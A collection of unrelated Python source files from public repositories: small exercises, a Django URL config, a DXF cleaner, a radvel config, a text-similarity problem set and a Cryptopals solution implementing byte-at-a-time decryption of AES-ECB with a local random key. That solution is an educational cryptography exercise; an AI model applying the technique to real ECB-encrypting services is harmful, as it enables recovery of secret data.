| 286 |
github-code
|
6
|
39287424615
|
import array
# check the following code for typecode for converting arrays into bytes
# and then cast bytes into memoryview object.
# https://docs.python.org/3/library/array.html
b = bytes(array.array("i", [1, 2, 3]))
print(b)
d = memoryview(b).cast("i")
# memory view object is an array actually so we can expand it.
print(*d)
|
1995parham-learning/python101
|
memory-view/main.py
|
main.py
|
py
| 332 |
python
|
en
|
code
| 3 |
github-code
|
6
|
1112432236
|
import numpy as np
from PIL import Image
import re
from wordcloud import WordCloud, ImageColorGenerator, STOPWORDS
import matplotlib.pyplot as plt
import matplotlib.pyplot as plt
mask= plt.imread('b.jpg')
#准备utf-8编码的文本文件file
fo=open('input.txt', 'r', encoding='utf-8')
strThousand = fo.read().lower()
fo.close()
#print(strThousand)
print("222")
#字符串预处理: #大小写#标点符号#特殊符号
sep = "."
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
sep = "\""
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
sep = "\'"
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
sep = ","
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
sep = "<"
for ch in sep:
strThousand = strThousand.replace(ch, ' ')
print("222")
#分解提取单词 list
strList = strThousand.split()
#print(len(strList), strList)
print("222")
#单词计数字典 set , dict
strSet = set(strList)
exclude = {'a', 'the', 'and', 'i', 'you', 'in'} #排除语法型词汇,代词、冠词、连词等无语义词
strSet = strSet-exclude
print("222")
#print(len(strSet), strSet)
print("222")
strDict = {}
for word in strSet:
strDict[word] = strList.count(word)
#print(len(strDict), strDict)
wcList = list(strDict.items())
#print(wcList)
print("222")
wcList.sort(key=lambda x: x[1], reverse=True) #按词频排序 list.sort(key=)
#print(wcList)
print("111")
for i in range(50): #输出TOP20
print(wcList[i])
my_wordcloud = WordCloud(scale=4,mask=mask,background_color='white',
max_words = 50,max_font_size = 60,random_state=20).generate(wcList)
#显示生成的词云
plt.imshow(my_wordcloud)
plt.axis("off")
plt.show()
#保存生成的图片
my_wordcloud.to_file('result.jpg')
|
Wang993/code_
|
code/ENGLISH WORD FRUQUECY_wordcloud.py
|
ENGLISH WORD FRUQUECY_wordcloud.py
|
py
| 1,768 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27250414296
|
import django
from django.contrib import admin
from django.urls import path, include
from django.conf.urls.static import static
from django.conf import settings
from drf_yasg.views import get_schema_view
from rest_framework.permissions import AllowAny
from drf_yasg import openapi
schema_url_v1_patterns = [
path(r'^api/auth/', include('authentication.urls')),
path(r'^api/community/', include('community.urls')),
path(r'^api/feature/', include('feature.urls')),
path(r'^api/account/', include('account.urls')),
path(r'^api/recommendation/', include('recommendation.urls')),
]
schema_view_v1 = get_schema_view(
openapi.Info(
title="NYOM Open API",
default_version='v1',
description="NYOM Open API Docs",
terms_of_service="https://www.google.com/policies/terms/",
license=openapi.License(name="License"),
),
validators=['flex'], #'ssv'],
public=True,
permission_classes=(AllowAny,),
patterns=schema_url_v1_patterns,
)
urlpatterns = [
path('admin/', admin.site.urls),
#path('', )
path('api/auth/', include('authentication.urls')),
path('api/community/', include('community.urls')),
path('api/feature/', include('feature.urls')),
path('api/account/', include('account.urls')),
path('api/recommendation/', include('recommendation.urls')),
# Auto DRF API docs
# path(r'swagger(?P<format>\.json|\.yaml)', schema_view_v1.without_ui(cache_timeout=0), name='schema-json'),
path(r'swagger', schema_view_v1.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),
path(r'redoc', schema_view_v1.with_ui('redoc', cache_timeout=0), name='schema-redoc-v1'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
moon-hy/lunch-recommendation
|
config/urls.py
|
urls.py
|
py
| 1,754 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8397431053
|
import os
from wsgiref.simple_server import make_server
from pyramid.config import Configurator
from colander import (
Boolean,
Integer,
Length,
MappingSchema,
OneOf,
SchemaNode,
SequenceSchema,
String
)
from deform import (
Form,
ValidationFailure,
widget
)
here = os.path.dirname(os.path.abspath(__file__))
class UserSchema(MappingSchema):
name = SchemaNode(String(),
description = 'Be comfortable here')
surname = SchemaNode(String(),
description = 'Be comfortable here')
email = SchemaNode(String(),
description = 'Be comfortable here')
def form_view(request):
schema = UserSchema()
myform = Form(schema, buttons=('submit',))
template_values = {}
template_values.update(myform.get_widget_resources())
if 'submit' in request.POST:
controls = request.POST.items()
try:
myform.validate(controls)
except ValidationFailure as e:
template_values['form'] = e.render()
else:
template_values['form'] = 'OK'
return template_values
template_values['form'] = myform.render()
return template_values
|
tennisracket/bonkh
|
bonkh/bonkh/app.py
|
app.py
|
py
| 1,227 |
python
|
en
|
code
| 0 |
github-code
|
6
|
73758139386
|
"""Docstring"""
import os
import ezdxf
from .file_utilities import check_file
def check_file_and_folder(
path, save_path, save=True
) -> list[ezdxf.document.Drawing] | None:
"""
Handle file or folder to apply the cleaning process
"""
if os.path.isdir(path):
list_dir = os.listdir(path)
try:
os.mkdir(save_path)
except FileExistsError:
pass
docs = []
for name in list_dir:
npath = os.path.join(path, name)
docs.append(check_file_and_folder(npath, os.path.join(save_path, name)))
else:
if check_file(path):
doc = ezdxf.readfile(path)
clean(doc)
if save:
doc.saveas(save_path)
docs = [doc]
else:
docs = None
print(f"{path} is not a dxf file")
return docs
def clean(doc: ezdxf.document.Drawing) -> None:
"""Apply functions to clean the doc"""
remove_sw(doc)
def remove_sw(doc: ezdxf.document.Drawing) -> None:
"""Remove the text included by solidworks from the doc file"""
blocks = doc.blocks
for bloc in blocks:
for entity in bloc:
if entity.dxftype() == "MTEXT":
if "SOLIDWORKS" in entity.text:
bloc.delete_entity(entity)
|
ldevillez/pySwTools
|
pyswtools/ready_dxf/dxf_utilities.py
|
dxf_utilities.py
|
py
| 1,326 |
python
|
en
|
code
| 3 |
github-code
|
6
|
35070389629
|
import shutil, errno, os
def copy(src, dst):
try:
shutil.copytree(src, dst)
except OSError as exc: # python >2.5
if exc.errno == errno.ENOTDIR:
shutil.copy(src, dst)
else: raise
def merge(src_dir, dest_dir):
#http://stackoverflow.com/questions/7419665/python-move-and-overwrite-files-and-folders
for src_dir, dirs, files in os.walk(src_dir):
dst_dir = src_dir.replace(src_dir, dest_dir)
if not os.path.exists(dst_dir):
os.mkdir(dst_dir)
for file_ in files:
src_file = os.path.join(src_dir, file_)
dst_file = os.path.join(dst_dir, file_)
if os.path.exists(dst_file):
os.remove(dst_file)
shutil.move(src_file, dst_dir)
|
jsdelivr/cleaner
|
cleaner/utils/copy.py
|
copy.py
|
py
| 737 |
python
|
en
|
code
| 1 |
github-code
|
6
|
73507090108
|
#!/usr/bin/python // 파이썬을 위한 파일임을 선언
# -*- coding: utf8 -*- // 인코딩 방식 지정 => 한글 주석으로 인한 실행 에러 방지
# 반복문 : for : 반복 횟수 예측 가능
# while : 반복 횟수 예측 불가능
# for : 사전에 또는 특정 상황에 맞춰서 미리 반복횟수 설정
# while : 특정 조건에 도달할 때까지 반복한다.
# for (초기값;조건식;증감값) --> for : 예측가능
# 파이썬 : 향상된 for문을 사용한다.
# for 변수 in 수열(리스트, 튜플)
# 파이썬에서 수열을 만들어내는 함수---> range()
# range(초기값;최종값;증감값)
# a = range(5) ---> 매개변수의 갯수 1개인 경우 : 최종값
# print(a)
# range(0, 5) ---> 매개변수의 갯수 2개인 경우 : (초기값, 최종값)
# Code.01
for i in range(5): # 반복횟수 : range수열의 갯수
print(i)
# Code.02
for i in range(-1, 5):
print(i)
# Code.03
for i in range(-1, 5, 2):
print(i)
# Code.04
a = [1,2,4,6,8,9,2]
for i in a:
print(i)
# Code.05
# 예제
# 오락실 기계
# 1. for : 게임비용 500원 ---> 투입되는 동전의 값이 고정 100원
# 100원동전이 5번 투입되면 게임시작되는 프로그램
# 2. while : 게임비용 500원 ---> 투입되는 동전의 변동 (사용자 마음대로)
total = 500
coin = 100
sum = 0
money = 0
cnt = int(total/coin)
for i in range(cnt):
money = int(input("동전을 투입해주세요:"))
if money != 100:
cnt = cnt - 1
print("동전 좀 제대로 넣으세요(잘못 넣은 금액은 수수료)")
continue
sum = sum + money
if sum >= total:
print("게임 시작")
# Code.06
# 리스트 내포(List comprehension)를 사용하면 좀 더 편리하고 직관적인 프로그램을 만들 수 있다
result = [x for x in range(1,10)]
print(result)
# Code.07
for i in range(1,10): # ①번 for문
for j in range(1, 10): # ②번 for문
print(i*j, end=" ")
print('')
# Code.08
for x in range(1, 10):
print(x)
print("빠져나가기")
break
|
Fhwang0926/class
|
python/basic/class_study_for.py
|
class_study_for.py
|
py
| 2,118 |
python
|
ko
|
code
| 0 |
github-code
|
6
|
41417945016
|
#!/usr/bin/env python3
# Cryptopals Challenge, Set 2, Challenge 12
# CJ Guttormsson
# 2017-01-03
import sys
sys.path.append('..')
from common import (get_random_key, base64_to_bytes, aes_128_ecb_encrypt,
guess_mode, pkcs7_pad)
import random
import itertools
#############
# CONSTANTS #
#############
# A random but constant key
UNKNOWN_KEY = get_random_key()
# The given data, that is not known in its decoded form
UNKNOWN_DATA = base64_to_bytes("""
Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkg
aGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBq
dXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUg
YnkK""")
#################
# NEW FUNCTIONS #
#################
def encrypt_ecb_with_unknowns(data: bytes) -> bytes:
"""Pad given data with the unknown data and encrypt with the unknown key"""
return aes_128_ecb_encrypt(data + UNKNOWN_DATA, UNKNOWN_KEY)
def guess_block_length(alg) -> int:
"""Given an encryption algorithm, guess the block length it uses."""
# Guess by observing how the size of the output text, which is always a
# multiple of the block length, changes.
last_length = len(alg(b''))
for data_length in itertools.count(1):
new_length = len(alg(b'\0' * data_length))
if new_length > last_length:
return new_length - last_length
def guess_unknown_string(alg) -> bytes:
"""Given the algorithm above, find the unknown data."""
assert guess_mode(alg) == 'ECB'
block_length = guess_block_length(alg)
# Guess one character at a time by shifting the unknown text so that only
# one unknown character is in the block we are looking at
known_bytes = b''
while True:
# figure out how much padding we need, and which block we're looking at
empty_block = bytes(block_length - (len(known_bytes) % 16) - 1)
start = (len(known_bytes) // 16) * 16
# Create a lookup table for each possible byte (result block -> byte)
results = {}
for possible_byte in (bytes([b]) for b in range(256)):
result = alg(empty_block+known_bytes+possible_byte)[start:start+16]
results[result] = possible_byte
# Look at what the answer should be, then use that to figure out
# which possible byte was correct
expected_block = alg(empty_block)[start:start+16]
if expected_block in results:
known_bytes += results[expected_block]
else:
break
# We must remove the last byte, since it will always be an extraneous
# \x01. This happens because of pkcs7 padding (but doesn't extend to
# \x02 or further because that causes the \x01 to change, rendering
# all guessed blocks invalid).
return known_bytes[:-1]
########
# MAIN #
########
def main():
# Determine block length
block_length = guess_block_length(encrypt_ecb_with_unknowns)
assert block_length == 16
# Determine the algorithm being used
assert guess_mode(encrypt_ecb_with_unknowns) == 'ECB'
# Guess the key
assert guess_unknown_string(encrypt_ecb_with_unknowns) == UNKNOWN_DATA
print('Challenge 12 completed successfully.')
if __name__ == '__main__':
main()
|
cjguttormsson/cryptopals
|
set2/challenge12.py
|
challenge12.py
|
py
| 3,257 |
python
|
en
|
code
| 1 |
github-code
|
6
|
20723823317
|
# Exercise 1 : What Are You Learning ?
#
# 1. Write a function called display_message() that prints one sentence telling everyone what you are learning in this course.
# 2. Call the function, and make sure the message displays correctly.
def display_message() :
print("I'm trying to become a web developer")
display_message()
# Exercise 2: What’s Your Favorite Book ?
#
# 1. Write a function called favorite_book() that accepts one parameter called title.
# 2. The function should print a message, such as "One of my favorite books is <title>".
# For example: “One of my favorite books is Alice in Wonderland”
# 3. Call the function, make sure to include a book title as an argument when calling the function.
def favorite_book(book_title) :
print(f"One of my favorite books is {book_title}")
book = input("What are you reading? ")
favorite_book(book)
# Exercise 3 : Some Geography
#
# 1. Write a function called describe_city() that accepts the name of a city and its country as parameters.
# 2. The function should print a simple sentence, such as "<city> is in <country>".
# For example “Reykjavik is in Iceland”
# 3. Give the country parameter a default value.
# 4. Call your function.
def describe_city(city, country = "Israel") :
print(f"{city} is in {country}")
describe_city(input("City name: "))
# Exercise 4 : Random
#
# 1. Create a function that accepts a number between 1 and 100 and generates another number randomly between 1 and 100.
# 2. Compare the two numbers, if it’s the same number, display a success message,
# otherwise show a fail message and display both numbers.
import random
def compare_numbers(num):
rand_num = random.randint(1, 100)
if num == rand_num:
print("Success! You guessed the number.")
else:
print("Fail! The numbers are different.")
print(f"Your number was: {num}. And win number was: {rand_num}")
compare_numbers(50)
# Exercise 5 : Let’s Create Some Personalized Shirts !
#
# 1. Write a function called make_shirt() that accepts a size and the text of a message that should be printed on the shirt.
# 2. The function should print a sentence summarizing the size of the shirt and the message printed on it, such as
# "The size of the shirt is <size> and the text is <text>"
# 3. Call the function make_shirt().
# 4. Modify the make_shirt() function so that shirts are large by default with a message that reads “I love Python” by default.
# 5. Make a large shirt with the default message
# 6. Make medium shirt with the default message
# 7. Make a shirt of any size with a different message.
# Bonus: Call the function make_shirt() using keyword arguments.
def make_shirt(size = "large", massage = "I love Python") :
print(f"The size of the shirt is {size} and the text is {massage}")
make_shirt("XL", "Marvel")
make_shirt()
make_shirt("medium")
make_shirt(size = "Small", massage = "I always want to sleep... zzz")
# Exercise 6 : Magicians …
#
# 1. Using this list of magician’s names. magician_names = ['Harry Houdini', 'David Blaine', 'Criss Angel']
# 2. Pass the list to a function called show_magicians(), which prints the name of each magician in the list.
# 3. Write a function called make_great() that modifies the list of magicians by adding the phrase "the Great"
# to each magician’s name.
# 4. Call the function make_great().
# 5. Call the function show_magicians() to see that the list has actually been modified.
magician_names = ['Harry Houdini', 'David Blaine', 'Criss Angel']
def show_magicians(name_list) :
for name in name_list :
print(name)
show_magicians(magician_names)
def make_great(name_list) :
for i in range(len(name_list)) :
name_list[i] = "The Great " + name_list[i]
make_great(magician_names)
show_magicians(magician_names)
# Exercise 7 : Temperature Advice
#
# 1. Create a function called get_random_temp().
# 1. This function should return an integer between -10 and 40 degrees (Celsius), selected at random.
# 2. Test your function to make sure it generates expected results.
# 2. Create a function called main().
# 1. Inside this function, call get_random_temp() to get a temperature, and store its value in a variable.
# 2. Inform the user of the temperature in a friendly message, eg. “The temperature right now is 32 degrees Celsius.”
# 3. Let’s add more functionality to the main() function. Write some friendly advice relating to the temperature:
# 1. below zero (eg. “Brrr, that’s freezing! Wear some extra layers today”)
# 2. between zero and 16 (eg. “Quite chilly! Don’t forget your coat”)
# 3. between 16 and 23
# 4. between 24 and 32
# 5. between 32 and 40
# 4. Change the get_random_temp() function:
# 1. Add a parameter to the function, named ‘season’.
# 2. Inside the function, instead of simply generating a random number between -10 and 40,
# set lower and upper limits based on the season, eg. if season is ‘winter’,
# temperatures should only fall between -10 and 16.
# 3. Now that we’ve changed get_random_temp(), let’s change the main() function:
# 1. Before calling get_random_temp(), we will need to decide on a season,
# so that we can call the function correctly. Ask the user to type in a season -
# ‘summer’, ‘autumn’ (you can use ‘fall’ if you prefer), ‘winter’, or ‘spring’.
# 2. Use the season as an argument when calling get_random_temp().
# 5. Bonus: Give the temperature as a floating-point number instead of an integer.
# 6. Bonus: Instead of asking for the season, ask the user for the number of the month (1 = January, 12 = December). Determine the season according to the month.
import random
def get_random_temp(season):
if season == 'winter':
return round(random.uniform(-10, 16), 1)
elif season == 'spring' or season == 'autumn' or season == 'fall':
return round(random.uniform(0, 23), 1)
elif season == 'summer':
return round(random.uniform(16, 40), 1)
else:
return "Invalid season"
def main():
month = int(input("Enter the number of the month (1-12): "))
if month in [12, 1, 2]:
season = 'winter'
elif month in [3, 4, 5]:
season = 'spring'
elif month in [6, 7, 8]:
season = 'summer'
elif month in [9, 10, 11]:
season = 'autumn'
else:
print("Invalid month")
return
temperature = get_random_temp(season)
if isinstance(temperature, str):
print(temperature)
else:
print("The temperature right now is", temperature, "degrees Celsius.")
if temperature < 0:
print("Brrr, that’s freezing! Wear some extra layers today")
elif temperature >= 0 and temperature < 16:
print("Quite chilly! Don’t forget your coat")
elif temperature >= 16 and temperature < 24:
print("The weather is pleasant")
elif temperature >= 24 and temperature < 32:
print("It's quite warm today, stay hydrated")
else:
print("It's very hot! Stay indoors if possible")
main()
|
Alex-Rabaev/DI-Bootcamp
|
week 2/Day 4/ExercisesXP/w2d4exerciseXP.py
|
w2d4exerciseXP.py
|
py
| 7,262 |
python
|
en
|
code
| 1 |
github-code
|
6
|
43724375221
|
import sys
from PySide6.QtGui import QGuiApplication
from PySide6.QtQml import *
from ppt import Maker
if __name__ == "__main__":
app = QGuiApplication(sys.argv)
qmlRegisterType(Maker, "ppt", 1, 0, "Maker")
engine = QQmlApplicationEngine()
engine.load('main.qml')
if not engine.rootObjects():
sys.exit(-1)
exit_code = app.exec()
del engine
sys.exit(exit_code)
|
JunTae90/MinChae
|
main.py
|
main.py
|
py
| 400 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21485752439
|
# import heapq
from collections import deque
class Solution:
def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:
wordList = set(wordList)
if endWord not in wordList:return 0
n = len(wordList)
# def getdist(x, y):
# count = 0
# for i in range(len(x)):
# if x[i] != y[i]:
# count += 1
# return count
visited = [0] * n
queue = deque([])
queue.append(beginWord)
level = 1
while queue:
size = len(queue)
for i in range(size):
word = queue.popleft()
if word == endWord:
return level
else:
for j in range(len(word)):
temp = list(word)
for k in range(26):
if chr(ord('a') + k) != temp[j]:
temp[j] = chr(ord('a') + k)
newword = "".join(temp)
if newword in wordList:
queue.append(newword)
wordList.remove(newword)
level += 1
return 0
# 这一道题,第一反应就知道是一个bfs,然后写完之后超时了,琢磨了半天在怀疑是不是自己的bfs写的效率不高,尝试用heapq去做一些启发搜索,但是一直超时,而且启发的时候如果不把level放在第一有些级会出现错误结果。
# 看了答案后,发现这个题的关键在于计算这个**只更改一个字符**的距离。 我使用的方法是针对每两个word比较他们的距离,这样的复杂度就等于wordlen * n * n。
# 而有一个巧妙的方法,针对每一个word,把所有跟他距离唯一的word都求出来,然后判断是否在现存dict中,这样由于hash操作复杂度为O(1),那么这个方案的复杂度只有wordlen * 26 * n,在n很大的时候改善很明显。
# 所以这里面关键是,忘记了用hashset来存储这些word,他的查找时间O(1)非常优秀!
|
bboychencan/Algorithm
|
leetcode/127.py
|
127.py
|
py
| 2,238 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
43633665683
|
# pylint: disable=no-self-use,invalid-name
from __future__ import division
from __future__ import absolute_import
import pytest
from allennlp.data.dataset_readers.conll2003 import Conll2003DatasetReader
from allennlp.common.util import ensure_list
from allennlp.common.testing import AllenNlpTestCase
class TestConll2003Reader(object):
@pytest.mark.parametrize(u"lazy", (True, False))
@pytest.mark.parametrize(u"coding_scheme", (u'IOB1', u'BIOUL'))
def test_read_from_file(self, lazy, coding_scheme):
conll_reader = Conll2003DatasetReader(lazy=lazy, coding_scheme=coding_scheme)
instances = conll_reader.read(unicode(AllenNlpTestCase.FIXTURES_ROOT / u'data' / u'conll2003.txt'))
instances = ensure_list(instances)
if coding_scheme == u'IOB1':
expected_labels = [u'I-ORG', u'O', u'I-PER', u'O', u'O', u'I-LOC', u'O']
else:
expected_labels = [u'U-ORG', u'O', u'U-PER', u'O', u'O', u'U-LOC', u'O']
fields = instances[0].fields
tokens = [t.text for t in fields[u'tokens'].tokens]
assert tokens == [u'U.N.', u'official', u'Ekeus', u'heads', u'for', u'Baghdad', u'.']
assert fields[u"tags"].labels == expected_labels
fields = instances[1].fields
tokens = [t.text for t in fields[u'tokens'].tokens]
assert tokens == [u'AI2', u'engineer', u'Joel', u'lives', u'in', u'Seattle', u'.']
assert fields[u"tags"].labels == expected_labels
|
plasticityai/magnitude
|
pymagnitude/third_party/allennlp/tests/data/dataset_readers/conll2003_dataset_reader_test.py
|
conll2003_dataset_reader_test.py
|
py
| 1,471 |
python
|
en
|
code
| 1,607 |
github-code
|
6
|
11826395530
|
# Example Keplerian fit configuration file
# Required packages for setup
import os
import pandas as pd
import numpy as np
import radvel
import os
# Define global planetary system and dataset parameters
starname = 'HD217014'
nplanets = 1 # number of planets in the system
instnames = ['j'] # list of instrument names. Can be whatever you like but should match 'tel' column in the input file.
ntels = len(instnames) # number of instruments with unique velocity zero-points
fitting_basis = 'per tc secosw sesinw k' # Fitting basis, see radvel.basis.BASIS_NAMES for available basis names
bjd0 = 2.44e6 + 3927.050417
planet_letters = {1: 'b'}
# Define prior centers (initial guesses) here.
params = radvel.RVParameters(nplanets,basis='per tc e w k') # initialize RVparameters object
params['per1'] = 4.23078166873 # period of 1st planet
params['tc1'] = 2072.79438 # time of inferior conjunction of 1st planet
params['e1'] = 0.00 # eccentricity of 'per tc secosw sesinw logk'1st planet
params['w1'] = np.pi/2. # argument of periastron of the star's orbit for 1st planet
params['k1'] = 35.7 # velocity semi-amplitude for 1st planet
params['dvdt'] = 0.0 # slope
params['curv'] = 0.0 # curvature
params['gamma_j'] = 1.0 # " " hires_rj
params['jit_j'] = 2.6 # " " hires_rj
# Load radial velocity data, in this example the data is contained in an hdf file,
# the resulting dataframe or must have 'time', 'mnvel', 'errvel', and 'tel' keys
# path = os.path.join(radvel.DATADIR,'epic203771098.csv')
data = pd.read_csv('C:/users/rscsa/Research/radvel-master/HD217014/HD217014.csv')
data['time'] = data.time
data['mnvel'] = data.mnvel
data['errvel'] = data.errvel
data['tel'] = 'j'
# print data['time']
# Set parameters to be held constant (default is for all parameters to vary). Must be defined in the fitting basis
vary = dict(
#dvdt =False,
curv =False,
#jit_j =False,
#per1 =False,
#tc1 =False,
#secosw1 =False,
#sesinw1 = False,
#e1=False,
#w1=False,
#k1=False
# per2 = False,
# tc2 = False,
# secosw2 = False,
# sesinw2 = False
)
# Define prior shapes and widths here.
priors = [
radvel.prior.EccentricityPrior( nplanets ), # Keeps eccentricity < 1
radvel.prior.PositiveKPrior( nplanets ), # Keeps K > 0
radvel.prior.Gaussian('tc1', params['tc1'], 300), # Gaussian prior on tc1 with center at tc1 and width 0.01 days
radvel.prior.Gaussian('per1', params['per1'], 1),
# radvel.prior.Gaussian('tc2', params['tc2'], 0.01),
# radvel.prior.Gaussian('per2', params['per2'], 0.01),
radvel.prior.HardBounds('jit_j', 0.0, 15.0)
]
time_base = np.mean([np.min(data.time), np.max(data.time)]) # abscissa for slope and curvature terms (should be near mid-point of time baseline)
# optional argument that can contain stellar mass and
# uncertainties. If not set, mstar will be set to nan.
# stellar = dict(mstar=1.12, mstar_err= 0.05)
# optional argument that can contain planet radii, used for computing densities
# planet = dict(
# rp1=5.68, rp_err1=0.56,
# rp2=7.82, rp_err2=0.72,
# )
|
ruben-santana/Astro-Research
|
HD217014/HD217014.py
|
HD217014.py
|
py
| 3,206 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71888988667
|
"""
需要备份的文件和目录由一个列表指定。
备份应该保存在主备份目录中。
文件备份成一个zip文件。
zip存档的名称是当前的日期和时间。
我们使用标准的zip命令,它通常默认地随Linux/Unix发行版提供。Windows用户可以使用Info-Zip程序。注意你可以使用任何地存档命令,
只要它有命令行界面就可以了,那样的话我们可以从我们的脚本中传递参数给它。
"""
import zipfile
def zip_files(files, zip_name):
zip = zipfile.ZipFile( zip_name, 'w')
for file in files:
print ('compressing', file)
zip.write( file )
zip.close()
print ('compressing finished')
files = ['D:\I\'M\\usedbypython\\1.txt']#文件的位置,多个文件用“,”隔开
zip_file = 'D:\I\'M\\usedbypython\\2.zip'#压缩包名字
zip_files(files, zip_file)
|
fivespeedasher/Pieces
|
重要文件创建备份.py
|
重要文件创建备份.py
|
py
| 874 |
python
|
zh
|
code
| 0 |
github-code
|
6
|
71443305149
|
# 6.100A Fall 2023
# Problem Set 3
# Name: <insert name>
# Collaborators: <insert collaborators>
"""
Description:
Computes the similarity between two texts using two different metrics:
(1) shared words, and (2) term frequency-inverse document
frequency (TF-IDF).
"""
import string
import math
import re
### DO NOT MODIFY THIS FUNCTION
def load_file(filename):
"""
Args:
filename: string, name of file to read
Returns:
string, contains file contents
"""
# print("Loading file %s" % filename)
inFile = open(filename, 'r')
line = inFile.read().strip()
for char in string.punctuation:
line = line.replace(char, "")
inFile.close()
return line.lower()
### Problem 1: Prep Data ###
def prep_data(input_text):
"""
Args:
input_text: string representation of text from file,
assume the string is made of lowercase characters
Returns:
list representation of input_text, where each word is a different element in the list
"""
return input_text.split()
### Problem 2: Get Frequency ###
def get_frequencies(word_list):
"""
Args:
word_list: list of strings, all are made of lowercase characters
Returns:
dictionary that maps string:int where each string
is a word in l and the corresponding int
is the frequency of the word in l
"""
outputDict = {}
for word in word_list:
if word in outputDict:
outputDict[word] += 1
else:
outputDict[word] = 1
return outputDict
### Problem 3: Get Words Sorted by Frequency
def get_words_sorted_by_frequency(frequencies_dict):
"""
Args:
frequencies_dict: dictionary that maps a word to its frequency
Returns:
list of words sorted by decreasing frequency with ties broken
by alphabetical order
"""
return sorted(frequencies_dict, key=lambda x: (-frequencies_dict[x], x))
### Problem 4: Most Frequent Word(s) ###
def get_most_frequent_words(dict1, dict2):
"""
The keys of dict1 and dict2 are all lowercase,
you will NOT need to worry about case sensitivity.
Args:
dict1: frequency dictionary for one text
dict2: frequency dictionary for another text
Returns:
list of the most frequent word(s) in the input dictionaries
The most frequent word:
* is based on the combined word frequencies across both dictionaries.
If a word occurs in both dictionaries, consider the sum the
frequencies as the combined word frequency.
* need not be in both dictionaries, i.e it can be exclusively in
dict1, dict2, or shared by dict1 and dict2.
If multiple words are tied (i.e. share the same highest frequency),
return an alphabetically ordered list of all these words.
"""
combindedDict = {}
for key in dict1:
if key in combindedDict:
combindedDict[key] += dict1[key]
else:
combindedDict[key] = dict1[key]
for key in dict2:
if key in combindedDict:
combindedDict[key] += dict2[key]
else:
combindedDict[key] = dict2[key]
return sorted([key for key in combindedDict if combindedDict[key] == max(combindedDict.values())])
### Problem 5: Similarity ###
def calculate_similarity_score(dict1, dict2):
"""
The keys of dict1 and dict2 are all lowercase,
you will NOT need to worry about case sensitivity.
Args:
dict1: frequency dictionary of words of text1
dict2: frequency dictionary of words of text2
Returns:
float, a number between 0 and 1, inclusive
representing how similar the words/texts are to each other
The difference in words/text frequencies = DIFF sums "frequencies"
over all unique elements from dict1 and dict2 combined
based on which of these three scenarios applies:
* If an element occurs in dict1 and dict2 then
get the difference in frequencies
* If an element occurs only in dict1 then take the
frequency from dict1
* If an element occurs only in dict2 then take the
frequency from dict2
The total frequencies = ALL is calculated by summing
all frequencies in both dict1 and dict2.
Return 1-(DIFF/ALL) rounded to 2 decimal places
"""
diff = 0
for key in dict1:
if key in dict2:
diff += abs(dict1[key] - dict2[key])
else:
diff += dict1[key]
for key in dict2:
if key not in dict1:
diff += dict2[key]
all = sum([dict1[key] for key in dict1]) + sum([dict2[key] for key in dict2])
return round(1 - (diff / all), 2)
### Problem 6: Finding TF-IDF ###
def get_tf(text_file):
"""
Args:
text_file: name of file in the form of a string
Returns:
a dictionary mapping each word to its TF
* TF is calculated as TF(i) = (number times word *i* appears
in the document) / (total number of words in the document)
* Think about how we can use get_frequencies from earlier
"""
returnDict = {}
dict = get_frequencies(prep_data(load_file(text_file)))
print(dict)
for key in dict:
returnDict[key] = dict[key] / sum([dict[key] for key in dict])
return returnDict
def get_idf(text_files):
"""
Args:
text_files: list of names of files, where each file name is a string
Returns:
a dictionary mapping each word to its IDF
* IDF is calculated as IDF(i) = log_10(total number of documents / number of
documents with word *i* in it), where log_10 is log base 10 and can be called
with math.log10()
"""
dict = {}
for file in text_files:
for key in get_frequencies(prep_data(load_file(file))):
if key in dict:
dict[key] += 1
else:
dict[key] = 1
for key in dict:
dict[key] = math.log10(len(text_files) / dict[key])
return dict
def get_tfidf(text_file, text_files):
"""
Args:
text_file: name of file in the form of a string (used to calculate TF)
text_files: list of names of files, where each file name is a string
(used to calculate IDF)
Returns:
a sorted list of tuples (in increasing TF-IDF score), where each tuple is
of the form (word, TF-IDF). In case of words with the same TF-IDF, the
words should be sorted in increasing alphabetical order.
* TF-IDF(i) = TF(i) * IDF(i)
"""
tf = get_tf(text_file)
idf = get_idf(text_files)
return sorted([(key, tf[key] * idf[key]) for key in tf], key=lambda x: (x[1], x[0]))
if __name__ == "__main__":
pass
##Uncomment the following lines to test your implementation
# Tests Problem 1: Prep Data
test_directory = "tests/student_tests/"
hello_world, hello_friend = load_file(test_directory + 'hello_world.txt'), load_file(test_directory + 'hello_friends.txt')
world, friend = prep_data(hello_world), prep_data(hello_friend)
# print(world) ## should print ['hello', 'world', 'hello', 'there']
# print(friend) ## should print ['hello', 'friends']
## Tests Problem 2: Get Frequencies
world_word_freq = get_frequencies(world)
friend_word_freq = get_frequencies(friend)
# print(world_word_freq) ## should print {'hello': 2, 'world': 1, 'there': 1}
# print(friend_word_freq) ## should print {'hello': 1, 'friends': 1}
# ## Tests Problem 3: Get Words Sorted by Frequency
world_words_sorted_by_freq = get_words_sorted_by_frequency(world_word_freq)
friend_words_sorted_by_freq = get_words_sorted_by_frequency(friend_word_freq)
# print(world_words_sorted_by_freq) ## should print ['hello', 'there', 'world']
# print(friend_words_sorted_by_freq) ## should print ['friends', 'hello']
## Tests Problem 4: Most Frequent Word(s)
freq1, freq2 = {"hello":5, "world":1}, {"hello":1, "world":5}
most_frequent = get_most_frequent_words(freq1, freq2)
# print(most_frequent) ## should print ["hello", "world"]
## Tests Problem 5: Similarity
test_directory = "tests/student_tests/"
hello_world, hello_friend = load_file(test_directory + 'hello_world.txt'), load_file(test_directory + 'hello_friends.txt')
world, friend = prep_data(hello_world), prep_data(hello_friend)
world_word_freq = get_frequencies(world)
